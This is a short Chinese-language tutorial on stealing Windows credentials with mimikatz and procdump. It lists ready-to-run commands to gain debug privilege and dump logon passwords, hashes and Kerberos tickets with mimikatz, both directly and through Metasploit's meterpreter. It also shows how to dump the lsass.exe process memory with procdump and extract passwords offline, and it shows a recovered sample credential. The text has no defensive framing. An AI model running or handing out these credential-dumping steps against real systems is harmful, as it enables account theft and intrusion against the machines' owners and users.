mimikatz和procdump的密码抓取

2023-04-20,,

mimikatz

mimikatz功能很强大,主要使用就是提取明文密码、哈希、PIN码和Kerberos凭证。

常用的只有两条命令:

注意:运行时使用管理员身份运行

   privilege::debug          # 提权
sekurlsa::logonPasswords # 获取密码

在msfconsole中的meterpreter模块使用mimikatz

  load mimikatz                    # 导入mimikatz模块
help # 查看帮助
mimikatz_command -f # 执行mimikatz模块的命令
mimikatz_command -f privilege::debug # 提权
mimikatz_command -f sekurlsa::logonPasswords # 获取密码

得到用户名为admin密码为123456

也有特殊一些情况,种种问题获取不到密码,可以试一试另一种方法。

procdump

一般用于管理员检测是什么程序导致CPU高峰,我们这里主要使用它的导出dump

首先了解到一个进程,lsass.exe,这个进程主要用于本地安全和登录策略

使用Procdump将其导出,使用mimikatz获取密码

1.导出lsass.exe进程

  procdump64.exe -accepteula -ma lsass.exe lsass.dmp

**2.使用mimikatz抓取密码

  sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

就会获取到密码

mimikatz和procdump的密码抓取的相关教程结束。

《mimikatz和procdump的密码抓取.doc》

下载本文的Word格式文档,以方便收藏与打印。